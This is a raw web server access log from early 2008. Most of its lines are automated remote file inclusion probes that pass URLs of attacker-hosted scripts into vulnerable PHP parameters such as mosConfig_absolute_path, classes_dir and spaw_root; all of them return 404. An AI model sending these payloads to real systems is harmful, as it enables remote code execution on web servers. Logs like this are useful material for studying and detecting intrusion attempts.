150.161.5.91 - - [30/Jan/2008:12:39:38 -0800] "GET /logs/access.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:39:38 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:39:39 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:39:54 -0800] "GET /logs/access.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:39:54 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:39:54 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.123.108.73 - - [30/Jan/2008:12:41:10 -0800] "GET /link.php?do=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:41:16 -0800] "GET /logs/access.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.133.76 - - [30/Jan/2008:12:41:35 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:12:41:37 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:41:45 -0800] "GET /logs/access_071230.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:42:13 -0800] "GET /logs/access_071230.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [30/Jan/2008:12:42:13 -0800] "GET /logs/access_071224.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.167.33 - - [30/Jan/2008:12:42:19 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.groovecalendar.com//tools/pr.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
81.169.167.33 - - [30/Jan/2008:12:42:19 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.groovecalendar.com//tools/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:43:16 -0800] "GET /logs/access_071230.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.32.14 - - [30/Jan/2008:12:43:33 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://jorgevolio.com/.cookies/safe.gif???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.32.14 - - [30/Jan/2008:12:43:35 -0800] "GET //appserv/main.php?appserv_root=http://jorgevolio.com/.cookies/safe.gif???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.32.14 - - [30/Jan/2008:12:43:36 -0800] "GET /logs//appserv/main.php?appserv_root=http://jorgevolio.com/.cookies/safe.gif???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.32.14 - - [30/Jan/2008:12:43:59 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://jorgevolio.com/.cookies/safe.gif???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.124.101 - - [30/Jan/2008:12:44:09 -0800] "GET /protection.php?action=logout&siteurl=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
64.202.124.101 - - [30/Jan/2008:12:44:09 -0800] "GET /logs/protection.php?action=logout&siteurl=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
24.23.164.127 - - [30/Jan/2008:12:45:08 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:46:48 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/confirm?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:46:48 -0800] "GET /include/inc_ext/spaw/dialogs/confirm?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:46:48 -0800] "GET /logs/include/inc_ext/spaw/dialogs/confirm?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:47:27 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/confirm?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:47:27 -0800] "GET /include/inc_ext/spaw/dialogs/confirm?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:47:28 -0800] "GET /logs/include/inc_ext/spaw/dialogs/confirm?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:12:48:14 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:12:48:14 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:12:48:14 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:12:48:18 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:12:48:18 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:12:48:18 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:12:48:25 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:12:48:25 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:12:48:25 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:12:49:13 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.23.164.127 - - [30/Jan/2008:12:49:16 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
24.23.164.127 - - [30/Jan/2008:12:49:16 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:12:49:17 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:12:49:24 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:49:34 -0800] "GET /logs/access_080101.log//akocomments.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:49:35 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:49:35 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:49:38 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:49:38 -0800] "GET /include/inc_ext/spaw/dialogs/table?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:49:38 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:12:50:06 -0800] "GET /logs/access_071231.log//akocomments.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.23.164.127 - - [30/Jan/2008:12:50:23 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:50:25 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/td?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:50:25 -0800] "GET /include/inc_ext/spaw/dialogs/td?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:50:26 -0800] "GET /logs/include/inc_ext/spaw/dialogs/td?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:50:37 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:50:37 -0800] "GET /include/inc_ext/spaw/dialogs/table?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:50:37 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:51:12 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/td?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:51:12 -0800] "GET /include/inc_ext/spaw/dialogs/td?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.108.98 - - [30/Jan/2008:12:51:12 -0800] "GET /logs/include/inc_ext/spaw/dialogs/td?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:12:51:51 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:12:51:51 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:12:51:52 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:12:52:33 -0800] "GET /logs/access_071219.log//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:12:52:39 -0800] "GET /logs/access_071219.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.206.47.130 - - [30/Jan/2008:12:53:15 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
63.206.47.130 - - [30/Jan/2008:12:53:15 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:12:53:18 -0800] "GET /logs/access_071219.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.206.47.130 - - [30/Jan/2008:12:53:19 -0800] "GET /plans/ HTTP/1.1" 200 974 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:12:53:36 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.23.104 - - [30/Jan/2008:12:53:37 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.197.88.126 - - [30/Jan/2008:12:53:42 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/confirm?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.197.88.126 - - [30/Jan/2008:12:53:43 -0800] "GET /include/inc_ext/spaw/dialogs/confirm?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.197.88.126 - - [30/Jan/2008:12:53:43 -0800] "GET /logs/include/inc_ext/spaw/dialogs/confirm?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.23.164.127 - - [30/Jan/2008:12:53:47 -0800] "GET /logs/access_071219.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.59.134.223 - - [30/Jan/2008:12:54:08 -0800] "GET /logs/include/inc_ext/spaw/dialogs/confirm?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:12:54:45 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:12:54:47 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:12:54:48 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.134.223 - - [30/Jan/2008:12:55:26 -0800] "GET /logs/include/inc_ext/spaw/dialogs/td?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:12:55:50 -0800] "GET /logs/access_071222.log//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:12:56:00 -0800] "GET /logs/access_071216.log//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:12:56:26 -0800] "GET /logs/access_071220.log//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:12:56:34 -0800] "GET /logs/access_071222.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:12:56:36 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:12:56:42 -0800] "GET /modules/My_eGallery/index.php?basepath=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:12:56:43 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:12:56:43 -0800] "GET /logs/access_071216.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.197.88.126 - - [30/Jan/2008:12:57:18 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.197.88.126 - - [30/Jan/2008:12:57:18 -0800] "GET /include/inc_ext/spaw/dialogs/table?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:12:57:19 -0800] "GET /logs/access_071220.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.197.88.126 - - [30/Jan/2008:12:57:19 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.197.88.126 - - [30/Jan/2008:12:57:20 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/td?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.197.88.126 - - [30/Jan/2008:12:57:21 -0800] "GET /include/inc_ext/spaw/dialogs/td?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.197.88.126 - - [30/Jan/2008:12:57:21 -0800] "GET /logs/include/inc_ext/spaw/dialogs/td?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:12:57:51 -0800] "GET /logs/access_071214.log//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.23.164.127 - - [30/Jan/2008:12:57:52 -0800] "GET /logs/access_071222.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.123.108.73 - - [30/Jan/2008:12:58:09 -0800] "GET /logs/access_071229.log/link.php?do=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [30/Jan/2008:12:58:14 -0800] "GET /logs/link.php?do=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.23.164.127 - - [30/Jan/2008:12:58:16 -0800] "GET /logs/access_071216.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
24.23.164.127 - - [30/Jan/2008:12:58:37 -0800] "GET /logs/access_071220.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:12:58:45 -0800] "GET /logs/access_071219.log//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.212.28.43 - - [30/Jan/2008:12:58:46 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.212.28.43 - - [30/Jan/2008:12:58:48 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:12:59:33 -0800] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:12:59:37 -0800] "GET /logs/access_071214.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:12:59:52 -0800] "GET /logs/access_071216.log//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:12:59:58 -0800] "GET /logs/access_071222.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:13:00:08 -0800] "GET /logs/access_071216.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.23.164.127 - - [30/Jan/2008:13:00:16 -0800] "GET /logs/access_071214.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.92.145.181 - - [30/Jan/2008:13:00:22 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:13:00:45 -0800] "GET /logs/access_071220.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:13:01:20 -0800] "GET /logs/access_071220.log//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.23.164.127 - - [30/Jan/2008:13:01:50 -0800] "GET /logs/access.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:13:01:57 -0800] "GET /logs/access_071230.log//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:13:02:11 -0800] "GET /logs/access_071222.log//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:13:02:25 -0800] "GET /logs/access_071214.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:13:02:46 -0800] "GET /logs/access_071224.log//classes/adodbt/sql.php?classes_dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:13:03:02 -0800] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
